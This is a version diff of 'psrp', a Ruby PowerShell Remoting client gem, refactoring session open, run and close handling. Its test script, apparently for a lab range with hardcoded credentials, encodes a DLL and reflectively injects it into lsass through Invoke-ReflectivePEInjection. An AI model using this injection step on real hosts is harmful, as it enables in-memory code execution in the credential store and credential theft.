psrp 0.0.2 → 0.0.3

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: 575126720862843abbe6a80daa2231676ea7d7c1
-  data.tar.gz: af1b27be56d15a5c155013bf3025d9a5013334c4
+  metadata.gz: 1c0eb58f46fa0b746b0d8f1fe2157764c22c8586
+  data.tar.gz: ad6ab72fdf78ead6c2b1a0a22497ef546529574d
 SHA512:
-  metadata.gz: 854431f6a0465b6005fd72788005ac19cbff1df5f65f84fd199a79d7eafddfd04f52ffa1f6ed2608b47172cf4d91bb25cf9e32d197246587bf9c30a8156e7cbc
-  data.tar.gz: 9bd255a5a9ddad36046255c17c91e9164c1cbd0de9a0a42ad7da71e25586c7a83a222d94b734f210507f677ea00f5ebb34cc628e1588ad5671bc41d1c851ea2b
+  metadata.gz: 3f0c16ebb4d24c80d0c13efff3f7a6cd0e6d5f0ff12d850bb2c15fc8750edbafd2afb66efe6bff8970d7fe4a5771619cd233d9339d7008e013866b9583e61357
+  data.tar.gz: 7df6cac6ea30fbf62dd765a5aa5d51872ed70df2a216b6fe8ee9c1b2fe0cebda19cc2c1390cf0de98b8315e96e74723b9f1b432b0722e5a980d7294168232716

data/.gitignore

@@ -1,3 +1,4 @@
 *~
 .#*
-.DS_Store
+.DS_Store
+script.ps1

data/lib/psrp.rb

@@ -61,33 +61,30 @@ module PSRP
       @opts = opts
 
       @xfer = HTTP::Negotiate.new(endpoint, @opts[:user], @opts[:pass], @opts)
+
+      @shell_id = nil
+      @generated_shell_id = nil
+      @opened = false
     end
 
-    def run_ps(command, shell_opts = {})
-                  
+    def open
       @logger.debug("[WinRM] opening remote runspacepool on #{@session_opts[:endpoint]}")
       msg = PSRP::WSMV::InitRunspacePool.new(@session_opts)
 
       resp_doc = @xfer.send_request(msg.build)
       
-      generated_shell_id = msg.shell_id
-
-      shell_id = REXML::XPath.first(resp_doc, "//*[@Name='ShellId']").text
-      @logger.debug("[WinRM] remote runspace #{shell_id} is open on #{@session_opts[:endpoint]}")
+      @generated_shell_id = msg.shell_id
 
+      @shell_id = REXML::XPath.first(resp_doc, "//*[@Name='ShellId']").text
+      @logger.debug("[WinRM] remote runspace #{@shell_id} is open on #{@session_opts[:endpoint]}")
 
-      # spec says:
-      # The client sends a wxf:Receive message (section 3.1.5.3.7) to the server to start receiving data from 
-      # the server. After each received wxf:ReceiveResponse message (section 3.2.5.3.8), the client sends another 
-      # wxf:Receive message until the RunspacePool transitions to a Closed or Broken state.
-            
-      out_processor = PSRP::WSMV::CommandOutputProcessor.new(@session_opts, @xfer)         
+      out_processor = PSRP::WSMV::CommandOutputProcessor.new(@session_opts, @xfer)
       
-      out_processor.command_output(shell_id, nil)
-      return nil if out_processor.command_done?
+      out_processor.command_output(@shell_id, nil)
+      return false if out_processor.command_done?
 
       while true
-        out_processor.command_output(shell_id, nil, true)
+        out_processor.command_output(@shell_id, nil, true)
         if out_processor.command_done?
           break
         end
@@ -105,76 +102,101 @@ module PSRP
         end
         
         if runspace_open
-          @logger.debug('Opened the runspace, sending command')
-            
-          command_id = SecureRandom.uuid.to_s.upcase
-          pipeline = PSRP::MessageEncoder.new(generated_shell_id, command_id, :CREATE_PIPELINE, {command: CGI.escapeHTML(command)})
+          @opened = true
+          return true
+        end
+      end
 
-          msg = PSRP::WSMV::CreatePipeline.new(@session_opts, shell_id, pipeline.fragments[0])
-          resp_doc = @xfer.send_request(msg.build)
+      return false
+    end
 
-          command_id = REXML::XPath.first(resp_doc, "//#{PSRP::WSMV::NS_WIN_SHELL}:CommandId").text
+    def run_ps(command, shell_opts = {})
 
-          # Send remaining fragments, if any
-          if pipeline.fragments.length > 1
-            for i in 1..(pipeline.fragments.length - 1)
-              msg = PSRP::WSMV::SendData.new(@session_opts, shell_id, command_id, pipeline.fragments[i])
-              resp_doc = @xfer.send_request(msg.build)
-            end
-          end
+      # spec says:
+      # The client sends a wxf:Receive message (section 3.1.5.3.7) to the server to start receiving data from 
+      # the server. After each received wxf:ReceiveResponse message (section 3.2.5.3.8), the client sends another 
+      # wxf:Receive message until the RunspacePool transitions to a Closed or Broken state.
+      if not @opened
+        raise PSRPError.new('This psrp instance is not connected, call .open ')
+      end
 
-          @logger.debug("Command Sent, waiting on responses")
-          out_processor.command_output(shell_id, command_id, true)
-          if out_processor.input_required?
-            raise PSRPError.new('This Tool Does Not Support Accepting Runtime Input')
-          end
-          
-          # retrieve all of the data from the command
-          while true  
-            out_processor.command_output(shell_id, command_id)
-            if out_processor.input_required?
-              raise PSRPError.new('This Tool Does Not Support Accepting Runtime Input')
-            end
-            if out_processor.command_done?
-              break
-            end
-          end 
+      out_processor = PSRP::WSMV::CommandOutputProcessor.new(@session_opts, @xfer)
+      
+      @logger.debug('Opened the runspace, sending command')
+            
+      command_id = SecureRandom.uuid.to_s.upcase
+      pipeline = PSRP::MessageEncoder.new(@generated_shell_id, command_id, :CREATE_PIPELINE, {command: CGI.escapeHTML(command)})
+
+      msg = PSRP::WSMV::CreatePipeline.new(@session_opts, @shell_id, pipeline.fragments[0])
+      resp_doc = @xfer.send_request(msg.build)
+
+      command_id = REXML::XPath.first(resp_doc, "//#{PSRP::WSMV::NS_WIN_SHELL}:CommandId").text
 
-          @logger.debug("Closing shell")
-          msg = PSRP::WSMV::CloseShell.new(@session_opts, shell_id)
+      # Send remaining fragments, if any
+      if pipeline.fragments.length > 1
+        for i in 1..(pipeline.fragments.length - 1)
+          msg = PSRP::WSMV::SendData.new(@session_opts, @shell_id, command_id, pipeline.fragments[i])
           resp_doc = @xfer.send_request(msg.build)
-          
-          # Deal with fragmented return values
-          datas = out_processor.defragmented
-
-          # Deal With Errors
-          # But not really doing it well
-          # PSRP - 2.2.3.15 ErrorRecord
-          if out_processor.has_error?
-            datas.each do |msg_id, msg|
-              if msg[:message_type] == PSRP::Message::MESSAGE_TYPES[:ERROR_RECORD]
-                raise PSRPError.new(un_psrp_escape(msg[:data]))
-              end
-            end
-          end
+        end
+      end
 
-          data = ''
-          out_processor.defragmented.each do |msg_id, msg|
-            xml = REXML::Document.new(msg[:data])
-            # TODO: do better deserialization based on MS-PSRP 2.2.5 
-            # Right now this only returns String primitives and String Extended Primitives
-            REXML::XPath.match(xml, "/S|/Obj/S").each do |n|
-              next if n.text.nil? || n.text.empty?
-              data += n.text + "\n"
-            end
+      @logger.debug("Command Sent, waiting on responses")
+      out_processor.command_output(@shell_id, command_id, true)
+      if out_processor.input_required?
+        raise PSRPError.new('This Tool Does Not Support Accepting Runtime Input')
+      end
+      
+      # retrieve all of the data from the command
+      while true  
+        out_processor.command_output(@shell_id, command_id)
+        if out_processor.input_required?
+          raise PSRPError.new('This Tool Does Not Support Accepting Runtime Input')
+        end
+        if out_processor.command_done?
+          break
+        end
+      end 
+
+      # Deal with fragmented return values
+      datas = out_processor.defragmented
+
+      # Deal With Errors
+      # But not really doing it well
+      # PSRP - 2.2.3.15 ErrorRecord
+      if out_processor.has_error?
+        datas.each do |msg_id, msg|
+          if msg[:message_type] == PSRP::Message::MESSAGE_TYPES[:ERROR_RECORD]
+            raise PSRPError.new(un_psrp_escape(msg[:data]))
           end
-          return data
         end
       end
+
+      data = ''
+      out_processor.defragmented.each do |msg_id, msg|
+        xml = REXML::Document.new(msg[:data])
+        # TODO: do better deserialization based on MS-PSRP 2.2.5 
+        # Right now this only returns String primitives and String Extended Primitives
+        REXML::XPath.match(xml, "/S|/Obj/S").each do |n|
+          next if n.text.nil? || n.text.empty?
+          data += n.text + "\n"
+        end
+      end
+      return data
     end
 
+    def close
+      @opened = false
+      @logger.debug("Closing shell")
+      msg = PSRP::WSMV::CloseShell.new(@session_opts, @shell_id)
+      resp_doc = @xfer.send_request(msg.build)
+    end    
+
     def un_psrp_escape(str)
-      str.gsub(/_x([0-9A-F]{4})_/i) { [Regexp.last_match[1].hex].pack('U') }
+      begin
+        str.gsub(/_x([0-9A-F]{4})_/i) { [Regexp.last_match[1].hex].pack('U') }
+      rescue Encoding::CompatibilityError
+        str
+      end
     end
   end
 end

data/lib/version.rb

@@ -3,5 +3,5 @@
 # PSRP module
 module PSRP
   # The version of the PSRP library
-  VERSION = '0.0.2'
+  VERSION = '0.0.3'
 end

data/test_psrp.rb

@@ -1,8 +1,11 @@
 require_relative 'lib/psrp'
+require 'zlib'
 
 endpoint = 'http://192.168.142.231:5985/wsman'
 psrp = PSRP::PSRPService.new(endpoint, :user => 'samo-range', :pass => 'somethinglonger12345!', :log_level => :info)
 
+psrp.open
+
 puts psrp.run_ps('echo "<xml><body>THIS IS NOT THE XML YOU ARE LOOKING FOR</body></xml>" > C:\hello; cat C:\hello')
 puts psrp.run_ps('systeminfo')
 puts psrp.run_ps('cat C:\hello')
@@ -12,20 +15,41 @@ puts psrp.run_ps('echo "' + "A" * (32725 + 1) * 30 + '" > C:\hello_A')
 
 puts psrp.run_ps('notepad')
 
-data =  Base64.strict_encode64(IO.binread('DemoDLL_RemoteProcess-x64.dll'))
-ps_script = "$ProcName = notepad\n"
-ps_script += "$PEBytes = [System.Convert]::FromBase64String('" + data + "')\n"
+b64_code = Base64.strict_encode64(IO.binread('DemoDLL_RemoteProcess-x64.dll'))
+data_io =  StringIO.new()
+gz = Zlib::GzipWriter.new(data_io)
+gz.write(b64_code)
+gz.close()
+data = Base64.strict_encode64(data_io.string())
+ps_script = "$ProcName = lsass\n"
+ps_script += "$data = [System.Convert]::FromBase64String('" + data + "')\n"
+ps_script += "$ms = New-Object System.IO.MemoryStream\n"
+ps_script += "$ms.Write($data, 0, $data.Length)\n"
+ps_script += "$ms.Seek(0,0) | Out-Null\n"
+ps_script += "$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))\n"
+ps_script += "$PEBytes = [System.Convert]::FromBase64String($sr.ReadToEnd())\n"
+
 ps_script += File.read('Invoke-ReflectivePEInjection.ps1')
 ps_script += "\nInvoke-ReflectivePEInjection -PEBytes $PEBytes\n"
 ps_script += "echo 'Command Reflected'\n"
 IO.binwrite('script.ps1', ps_script)
 puts psrp.run_ps(File.read('script.ps1'))
 
+psrp.close
 
 endpoint = 'http://192.168.142.232:5985/wsman'
 begin
   psrp = PSRP::PSRPService.new(endpoint, :user => 'samo-range', :pass => 'somethinglonger12345!', :log_level => :debug)
   psrp.run_ps('ipconfig')
+rescue PSRP::PSRPError
+    puts 'You should see this'
+end
+
+begin
+    psrp = PSRP::PSRPService.new(endpoint, :user => 'samo-range', :pass => 'somethinglonger12345!', :log_level => :debug)
+    psrp.open
+    psrp.run_ps('ipconfig')
 rescue HTTPClient::ConnectTimeoutError
-  puts 'Should See A Timeout on Not Able to Connect.'
+    puts 'Should See A Timeout on Not Able to Connect.'
 end
+

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: psrp
 version: !ruby/object:Gem::Version
-  version: 0.0.2
+  version: 0.0.3
 platform: ruby
 authors:
 - Sam Oluwalana
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2016-03-23 00:00:00.000000000 Z
+date: 2016-03-28 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: httpclient
@@ -153,7 +153,6 @@ files:
 - lib/wsmv/templates/runspace_availability.xml.erb
 - lib/wsmv/templates/session_capability.xml.erb
 - psrp.gemspec
-- script.ps1
 - test_psrp.rb
 homepage: http://github.com/soluwalana/PSRP-RB
 licenses: